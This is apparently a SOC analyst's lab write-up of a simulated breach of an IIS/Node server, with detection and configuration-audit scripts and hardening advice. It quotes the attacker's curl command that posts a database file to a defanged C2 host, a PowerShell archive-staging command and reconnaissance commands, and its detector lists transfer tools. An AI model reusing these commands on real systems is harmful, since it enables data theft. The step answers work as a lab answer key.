# SOCM-01: Database File Exfiltration Attempt Detected
➡ I received the following alert in the SIEM.

➡ Now I will investigate and analyze the incident to gather the evidence needed to complete the playbook.
➡ First, based on the information in the alert, I will answer the 5W1H questions.
* **Alert / Rule**: Database File Exfiltration Attempt Detected
* **Source**: DEV-SERVER-01 (192.168.15.4)
* **Destination**: 185.203.112.50 (c[.]elhn1m[.]io)
* **Timestamp**: 21 Jan 2026, 4:09PM
* **Action**: blocked
* **Severity**: critical
* **Artifact / IOC**: URL, domain, hash, process, mailbox, …
  * **C2**: hxxps[://]c[.]elhn1m[.]io/upload
  * **File exfiltrated**: FinovaDB.mdf
  * **Destination IP**: 185.203.112.50
  * **Process involved**: curl.exe
  * **Command-line**: `curl -X POST --data-binary @C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\FinovaDB.mdf hxxps[://]c[.]elhn1m[.]io/upload`
  * **Parent process**: w3wp.exe
* **Context**: EDR detected a suspicious attempt to copy and exfiltrate the database file FinovaDB.mdf from DEV-SERVER-01 (192.168.15.4).
### Step 1: TRIAGE: What is the IP address of the compromised server mentioned in this alert?
➡ Based on the information available in the alert, I was able to answer the first two questions.
✅ **Answer:** 192.168.15.4
### Step 2: TRIAGE: What is the name of the database file that was targeted for exfiltration?
✅ **Answer:** FinovaDB.mdf
---

### Step 3: CORRELATE: Check EDR logs - which process attempted to exfiltrate the database file?
➡ To find this information, I need to check the EDR to see which process on the server ran the malicious command.
✅ **Answer:** curl.exe
### Step 4: CORRELATE: What is the destination URL where the attacker attempted to send the database file?
➡ Following step 3, I can see in the command line the C2 server to which the attacker is trying to exfiltrate data.
✅ **Answer:** hxxps[://]c[.]elhn1m[.]io/upload
### Step 5: ROOT CAUSE: What is the parent process of the curl.exe process that executed the exfiltration command? Check Process History to identify how the command was spawned.
➡ From the EDR data in the previous steps, I knew that curl.exe was the process used for the exfiltration, and by tracing back through the process tree I could identify its parent process.
✅ **Answer:** w3wp.exe (Worker Process of IIS)
---
### Step 6: ROOT CAUSE: Which endpoint was used to execute the exfiltration command? Check IIS logs for suspicious endpoint activity around the alert time, correlating with the parent process identified in step 5.
➡ Let's continue searching for the root cause of why the attacker was able to remotely execute commands on the IIS web server.
➡ I accessed log management and searched for keywords related to the FinovaDB.mdf file being extracted. I discovered a log entry containing the malicious command at the exact time the alert appeared.
➡ From this, I identified the compromised endpoint and a webshell present on the server.

✅ **Answer:** /assets/cache.aspx
> Additional information analyzed: before moving on to the next step, I need to dig deeper into why there is a webshell on the server and how the attacker was able to bypass the WAF to upload it.
> Upon further investigation of the 20th, I observed the first signs of webshell activity.
> At 9:12 AM on the 20th, an EDR log was created with the event name "suspicious file create", and commands such as whoami and dir were executed.
> However, before that, there were many requests to the web server related to SQL injection attacks, all of which were blocked by the WAF. Nevertheless, there are two suspicious POST requests whose payloads were allowed by the WAF and executed; this suggests this is how the attacker was able to upload the cache.aspx file to the server.
>
> ➡ Hypothesis: At 9:08 AM on January 20, 2026, the IIS-hosted web application was successfully compromised through an unsafe deserialization vulnerability in a Node.js backend using React Server Components (CVE-2025-55182, "React2Shell"). The attacker delivered a crafted JSON payload to the /api/update/ endpoint, abusing prototype pollution techniques to reach the Function constructor and execute arbitrary server-side code with SYSTEM privileges.
> ➡ Shortly after successful exploitation, the attacker validated remote code execution by invoking reconnaissance commands such as whoami through a process spawned by `node.exe`. This activity was confirmed by Windows Security Event ID 4688, which showed node.exe spawning cmd.exe under the SYSTEM account.
> ➡ Following initial command execution, the attacker continued leveraging the compromised Node.js process to execute additional payloads, including encoded commands intended to evade endpoint detection controls. As a result, a webshell (`cache.aspx`) was uploaded to the server, enabling persistent remote command execution and long-term control over the system.
> All observed malicious activity originated from the Node.js backend process (node.exe as the parent) spawning Windows command shells (cmd.exe as the child) and executing under the SYSTEM security context.
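The parent/child relationships above (node.exe spawning cmd.exe, and later w3wp.exe spawning curl.exe) are exactly what a process-lineage detection should catch. The following is an added detection example of my own, not code from the original investigation or from any SIEM/EDR product: it scans process-creation records shaped like Windows Security Event ID 4688 and flags a web worker spawning a shell or a data-transfer tool. The sample events are constructed; the field names follow the 4688 event (NewProcessName, ParentProcessName, SubjectUserName, CommandLine) and the `time` key is an assumption about how an exported event carries its timestamp.

```python
"""Flag web-server worker processes spawning shells or transfer tools.

Added detection example for the parent/child relationship described in the
investigation; not code from the original writeup or from any SIEM/EDR product.
The sample events below are constructed: their fields mirror Windows Security
Event ID 4688 (NewProcessName, ParentProcessName, SubjectUserName, CommandLine);
the "time" key is an assumption about how an exported event carries its timestamp.
"""
import ntpath

# Processes that legitimately front the web application on DEV-SERVER-01.
WEB_PARENTS = {"w3wp.exe", "node.exe"}
# Children a web worker has no business spawning on a production web tier.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

# Constructed sample events (illustrative timestamps; the curl command line is the one from the alert).
SAMPLE_EVENTS = [
    {"time": "2026-01-20T09:08:31", "SubjectUserName": "SYSTEM",
     "ParentProcessName": r"C:\Program Files\nodejs\node.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"time": "2026-01-20T09:08:40", "SubjectUserName": "SYSTEM",
     "ParentProcessName": r"C:\Program Files\nodejs\node.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"time": "2026-01-21T16:09:02", "SubjectUserName": "SYSTEM",
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "NewProcessName": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -X POST --data-binary @C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\FinovaDB.mdf hxxps[://]c[.]elhn1m[.]io/upload"},
    # Benign: an interactive user opening a shell from Explorer.
    {"time": "2026-01-21T16:11:00", "SubjectUserName": "alice",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    # Benign: w3wp.exe starting a child that is not on the watch list.
    {"time": "2026-01-21T16:12:00", "SubjectUserName": "SYSTEM",
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "NewProcessName": r"C:\Windows\System32\conhost.exe",
     "CommandLine": "conhost.exe"},
]


def image_name(path: str) -> str:
    """Return the lower-cased executable name from a Windows path."""
    return ntpath.basename(path).lower()


def is_suspicious_spawn(event: dict) -> bool:
    """True when a web worker spawns a shell or a data-transfer utility."""
    return (image_name(event["ParentProcessName"]) in WEB_PARENTS
            and image_name(event["NewProcessName"]) in SUSPICIOUS_CHILDREN)


def find_suspicious_spawns(events: list) -> list:
    """Return one alert record per suspicious spawn, oldest first."""
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_suspicious_spawn(ev):
            alerts.append({
                "time": ev["time"],
                "lineage": f"{image_name(ev['ParentProcessName'])} -> {image_name(ev['NewProcessName'])}",
                "user": ev["SubjectUserName"],
                "command": ev["CommandLine"],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_spawns(SAMPLE_EVENTS):
        print(f"{alert['time']} {alert['lineage']} ({alert['user']}) :: {alert['command']}")
```

Run against the constructed events it reports the two node.exe -> cmd.exe spawns from the 20th and the w3wp.exe -> curl.exe spawn from the 21st, and stays quiet on the Explorer-launched shell. The watch lists are deliberately short; on a real host they should be tuned against a baseline of what the application's worker processes actually start, since a false positive here is far cheaper than the missed config_backup.zip exfiltration described later in this report.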
### Step 7: ROOT CAUSE: What is the external attacker IP address making requests to execute commands?
➡ Based on the information I've gathered so far, I can easily identify the attacker's IP address.
✅ **Answer:** 185.77.12.34
### Step 8: INVESTIGATION: Based on its location and behavior, what type of functionality does the /assets/cache.aspx file provide?
✅ **Answer:** web shell
---

### Step 9: TIMELINE: Before the exfiltration attempt, what directory listing command was executed to discover the database file?
➡ Continuing to search the SIEM for keywords related to "dir", I found that the attacker executed 5 directory listing commands, targeting the MS SQL Server data directory and other locations.
✅ **Answer:** dir C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA
### Step 10: TIMELINE: What is the IIS request ID for the directory listing command that discovered the database file?
➡ Looking at the request ID field in the logs will help identify the information.
✅ **Answer:** 1000145302
---

### Step 11: TIMELINE: Earlier in the attack chain, what PowerShell command was used to create a zip archive?
➡ In the previous step, I found many "dir" commands executed by the attacker, including one listing the files in the IIS web configuration folder. The attacker then proceeded to read the files `app.config, appsettings.json, connectionstrings.config, database.config, secrets.json, and web.config`. Once the files containing sensitive information were identified, the attacker compressed them into a single zip file named config_backup.zip.
✅ **Answer:** Compress-Archive -Path C:\inetpub\wwwroot\config\* -DestinationPath C:\Users\Public\config_backup.zip
---

### Step 12: INVESTIGATION: What directory was explored before the zip file was created? Check IIS logs for directory listing commands.
✅ **Answer:** C:\inetpub\wwwroot\config
---

### Step 13: INVESTIGATION: What files were collected and exfiltrated in the config_backup.zip? List all filenames in alphabetical order, separated by commas.
➡ Based on the information analyzed in the previous steps, I can easily answer this step's question, and I have one more piece of information: the config_backup.zip file was successfully exfiltrated by the attacker to the C2.
✅ **Answer:** appsettings.json, connectionstrings.config, database.config, secrets.json, web.config
---

### Step 14: IOC: Was the database file exfiltration attempt successful or blocked?
➡ Based on the WAF logs, the attempt to exfiltrate the DB file to the C2 was successfully blocked.
✅ **Answer:** BLOCKED
---
### Step 15: ASSESSMENT: Based on your investigation, what is your final assessment of this alert?
➡ Confirmed: this was a multi-stage attack chain in which the attacker successfully compromised the web server.
✅ **Answer:** True Positive - Blocked Database Exfiltration Attempt
---
### Step 16: CONTAINMENT: What immediate containment actions should be taken?
➡ Isolate: DEV-SERVER-01 (192.168.15.4)
➡ Remove: webshell
➡ Block IP: 185.77.12.34
✅ **Answer:** Isolate server - remove entry point - block domain
## ==NOTE: Please read SOCM-02 & 03 for more context==
## TIMELINE: The Overall Picture of The Chain Attack
### Summary:
1. Time of first attack recorded: 20 Jan 2026, 9:00 AM
1. Time of last attack recorded: 21 Jan 2026, 10:32PM
1. Target Machine: DEV-SERVER-01 (192.168.15.4)
1. Attacker's IP address: 185.77.12.34
1. C2 Server: 185.203.112.50
1. Related attack techniques: SQLi, SSRF, webshell, C2, Lateral movement, Port scanning, Beaconing
1. Security vulnerability: React2shell
1. Total number of alerts: 3
### Detail:
| Timestamp | Event Description |
|---------|------------------|
| **20 Jan 2026, 9:00 AM** | An attack against the web server was detected using common techniques such as **SQL Injection (SQLi), Server-Side Request Forgery (SSRF), Path Traversal, Cross-Site Scripting (XSS), and LDAP Injection**. These web exploitation attempts originated from IP address **185.77.12.34** and occurred within a **4-minute window**. The targeted endpoint was **/api/update**. |
| **20 Jan 2026, 9:08 AM** | Logs recorded malicious payloads that successfully **bypassed the WAF and achieved command execution**. The attacker likely completed reconnaissance and identified the web stack as **React and NestJS**, then exploited a newly disclosed vulnerability **React2Shell (CVE-2025-55182)**. Evidence includes log artifacts such as **('child_process').execSync**, and Windows logs confirming **node.exe spawning cmd.exe** to execute commands. |
| **20 Jan 2026, 9:12 AM** | The EDR detected that the attacker successfully created a **cache.aspx webshell**. However, due to issues in log collection, the payload responsible for uploading the webshell was only observed at **9:32 AM**. The webshell was located in the **assets directory** (requires verification with the relevant team). |
| **20 Jan 2026, 9:32 AM** | Payloads were observed downloading the **webshell** and **bash.exe** from **hxxps://raw[.]githubusercontent[.]com/elhnim-cos**. The webshell was used for direct command execution on the system, while **bash.exe** functioned as a beaconing agent, periodically signaling connection status back to the C2 server approximately every **30 minutes** (**c[.]elhn1m[.]io – 185.203.112.50**). As a result, **SOCM-03 alert** was generated. Beaconing activity persisted throughout **20 and 21 January**. |
| **21 Jan 2026, 10:00 AM** | Logs indicated that the attacker accessed and read files within the **web application’s config directory** to search for sensitive information. |
| **21 Jan 2026, 2:00 PM** | The attacker downloaded a **cryptomining tool (xmrig.exe)** and stored it as **C:\ProgramData\svchost32.exe**. |
| **21 Jan 2026, 4:00 PM** | The attacker executed the **dir** command to enumerate files, re-accessed the web application’s **config directory**, and compressed configuration files (**appsettings.json, database.config, secrets.json, web.config, connectionstrings.config**) into **C:\Users\Public\config_backup.zip**. |
| **21 Jan 2026, 4:07 PM** | The attacker successfully **exfiltrated config_backup.zip to the C2 server**. This action was not blocked due to the absence of an appropriate EDR detection rule. |
| **21 Jan 2026, 4:08 PM** | The attacker used **dir** to locate and read **MSSQL database files** at **C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA**, and attempted to exfiltrate **FinovaDB.mdf** to the C2 server. This action was **blocked by EDR**, triggering **SOCM-01 alert**. |
| **21 Jan 2026, 5:55 PM** | The attacker downloaded **nmap** and scanned multiple hosts across the internal network on various ports. A host **192.168.15.1** with **port 3389 (RDP)** open was identified. At **6:02 PM**, the attacker attempted to log in using the **Administrator** account, but the attempt was **blocked by EDR**, resulting in **SOCM-02 alert**. |
## Manager's question:
### The attacker exfiltrated a .zip file; the manager wants to know what those files contain and whether any configuration changes are needed to make the system secure.
The NSM detected the attack and successfully captured PCAP files covering the entire process in which the attacker attempted to exfiltrate files.
### 1. `secrets.json`
**Content**
This file contains **sensitive information**:
* **JWT Secret Key**: used to sign and validate authentication tokens.
* **API Keys**: Payment Gateway, Email (SendGrid), SMS (Twilio).
* **Encryption Keys**: used to encrypt data and tokens.
* **Database Admin Credentials**: database administrator username and password.
**Risk Assessment**
* This file represents a **single point of compromise**, which may lead to loss of control over the entire system.
* **Hard-coded secrets** are present in the configuration file.
**Recommendations**
* Do not deploy `secrets.json` in production environments.
* Rotate:
  * JWT Secret Key
  * API keys
  * Database admin password
---
### 2. `appsettings.json`
**Content**
* Logging level
* Application information
* Session timeout
* Feature flags (2FA, rate limiting, audit logging)
---
### 3. `connectionstrings.config`
**Content**
* Stores **database connection strings**, including:
  * Server
  * Database
  * Username / Password
  * SSL options
**Risks**
* Password stored in plaintext
* Encryption not enabled (`Encrypt=True` is missing)
* Certificate verification not enforced
**Recommendations**
* Do not hard-code passwords
* Enforce encryption and server certificate validation in the connection string:
```
Encrypt=True;
TrustServerCertificate=False;
```
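As an added example (mine, not part of the original report or of any vendor tool), the following Python checks a SQL Server connection string for the three weaknesses listed above: a plaintext password, a missing `Encrypt=True`, and certificate verification disabled through `TrustServerCertificate=True`. Both sample strings are constructed; `db_admin` and the password value are placeholders.

```python
"""Audit SQL Server connection strings for the weaknesses listed above.

Added example, not part of the original report or of any vendor tool. The two
sample strings are constructed; "db_admin" and the password value are placeholders.
"""

# Values that SQL clients accept as "encryption on" (Encrypt=Mandatory is the newer spelling).
ENCRYPT_ON = {"true", "yes", "mandatory"}


def parse_connection_string(conn: str) -> dict:
    """Split 'Key=Value;Key2=Value2' into a dict with lower-cased keys.

    Only the first '=' in each part separates key from value, so a value
    that itself contains '=' is preserved intact.
    """
    pairs = {}
    for part in conn.split(";"):
        if "=" not in part:
            continue
        key, _, value = part.partition("=")
        pairs[key.strip().lower()] = value.strip()
    return pairs


def audit_connection_string(conn: str) -> list:
    """Return a list of findings; an empty list means the string passes all three checks."""
    p = parse_connection_string(conn)
    findings = []
    if p.get("password") or p.get("pwd"):
        findings.append("password stored in plaintext in the connection string")
    if p.get("encrypt", "false").lower() not in ENCRYPT_ON:
        findings.append("Encrypt=True missing; the connection is not forced to use TLS")
    if p.get("trustservercertificate", "false").lower() in {"true", "yes"}:
        findings.append("TrustServerCertificate=True disables server certificate verification")
    return findings


# Constructed samples: the first mirrors the weaknesses found in connectionstrings.config,
# the second uses Windows integrated authentication plus the recommended TLS settings.
WEAK_CONN = ("Server=DEV-SERVER-01;Database=FinovaDB;User Id=db_admin;"
             "Password=PLACEHOLDER_PASSWORD;TrustServerCertificate=True")
HARDENED_CONN = ("Server=DEV-SERVER-01;Database=FinovaDB;Integrated Security=True;"
                 "Encrypt=True;TrustServerCertificate=False")

if __name__ == "__main__":
    for label, conn in (("weak", WEAK_CONN), ("hardened", HARDENED_CONN)):
        print(label, audit_connection_string(conn) or ["OK"])
```

The hardened sample removes the password by switching to integrated authentication; where SQL authentication has to stay, the password should be loaded from a secret store at runtime rather than written into the file. `TrustServerCertificate=False` only means something once `Encrypt=True` is set, which is why the audit reports the two separately.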
---
### 4. `database.config`
**Content**
* Database-related logic configuration:
  * Pooling
  * Timeout
  * Provider
  * Migration / schema
---
### 5. `web.config`
**Content**
* The **most critical file on IIS**
* Controls:
  * Request filtering
  * Modules
  * Error handling
  * Security headers
---
### Items to Review / Improve
* Block direct access to: `*.json`, `*.config`
* Disable:
  * Directory browsing
  * Detailed error messages
* Enable security headers:
  * `X-Frame-Options`
  * `X-Content-Type-Options`
  * `Content-Security-Policy`
* Restrict HTTP verbs to the ones the application needs (e.g., GET, POST).
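To turn the review items into a repeatable check, here is an added Python example (mine, not from the report or from Microsoft): it parses a site `web.config` and reports which of the items above are still open. Both `web.config` fragments are constructed; the element and attribute names are the standard `system.webServer` ones (`directoryBrowse`, `httpErrors`, `security/requestFiltering`, `httpProtocol/customHeaders`).

```python
"""Check an IIS site web.config against the review items listed above.

Added example, not from the original report or from Microsoft. The two
web.config fragments are constructed: one reflects the weak state implied by
the review items, the other the hardened configuration.
"""
import xml.etree.ElementTree as ET

REQUIRED_HEADERS = {"X-Frame-Options", "X-Content-Type-Options", "Content-Security-Policy"}
BLOCKED_EXTENSIONS = {".json", ".config"}
ALLOWED_VERBS = {"GET", "POST"}


def audit_web_config(xml_text: str) -> list:
    """Return one finding string per open review item (empty list = all items closed)."""
    root = ET.fromstring(xml_text)
    # Iterate explicitly rather than using a path, since the tag contains a dot.
    ws = next((c for c in root if c.tag == "system.webServer"), None)
    if ws is None:
        return ["no <system.webServer> section found"]
    findings = []

    db = ws.find("directoryBrowse")
    if db is not None and db.get("enabled", "false").lower() == "true":
        findings.append("directory browsing is enabled")

    # IIS default is DetailedLocalOnly; only 'Detailed' leaks details to remote clients.
    he = ws.find("httpErrors")
    if he is not None and he.get("errorMode", "") == "Detailed":
        findings.append("httpErrors errorMode=Detailed exposes error details to remote clients")

    denied = {
        a.get("fileExtension", "").lower()
        for a in ws.findall("security/requestFiltering/fileExtensions/add")
        if a.get("allowed", "true").lower() == "false"
    }
    for ext in sorted(BLOCKED_EXTENSIONS - denied):
        findings.append(f"requests for {ext} files are not blocked by request filtering")

    verbs = ws.find("security/requestFiltering/verbs")
    if verbs is None or verbs.get("allowUnlisted", "true").lower() != "false":
        findings.append("HTTP verbs are not restricted (verbs allowUnlisted should be false)")
    else:
        allowed = {a.get("verb", "").upper() for a in verbs.findall("add")
                   if a.get("allowed", "true").lower() == "true"}
        extra = allowed - ALLOWED_VERBS
        if extra:
            findings.append(f"unexpected verbs allowed: {', '.join(sorted(extra))}")

    present = {a.get("name") for a in ws.findall("httpProtocol/customHeaders/add")}
    for header in sorted(REQUIRED_HEADERS - present):
        findings.append(f"security header {header} is not set")
    return findings


# Constructed: the weak state the review items describe.
WEAK_WEB_CONFIG = """<configuration>
  <system.webServer>
    <directoryBrowse enabled="true" />
    <httpErrors errorMode="Detailed" />
  </system.webServer>
</configuration>"""

# Constructed: every review item addressed.
HARDENED_WEB_CONFIG = """<configuration>
  <system.webServer>
    <directoryBrowse enabled="false" />
    <httpErrors errorMode="DetailedLocalOnly" />
    <security>
      <requestFiltering>
        <fileExtensions>
          <add fileExtension=".json" allowed="false" />
          <add fileExtension=".config" allowed="false" />
        </fileExtensions>
        <verbs allowUnlisted="false">
          <add verb="GET" allowed="true" />
          <add verb="POST" allowed="true" />
        </verbs>
      </requestFiltering>
    </security>
    <httpProtocol>
      <customHeaders>
        <add name="X-Frame-Options" value="DENY" />
        <add name="X-Content-Type-Options" value="nosniff" />
        <add name="Content-Security-Policy" value="default-src 'self'" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>
</configuration>"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(label, audit_web_config(cfg) or ["all review items closed"])
```

Two caveats when using this on a real server: the check only sees the site-level file, so settings inherited from `applicationHost.config` (which already denies some extensions by default) are invisible to it and a reported gap should be confirmed against the effective configuration; and denying `.json` by extension also blocks any static JSON assets the application legitimately serves, so that rule may need to be scoped to the config directory with a `<location>` element rather than applied site-wide.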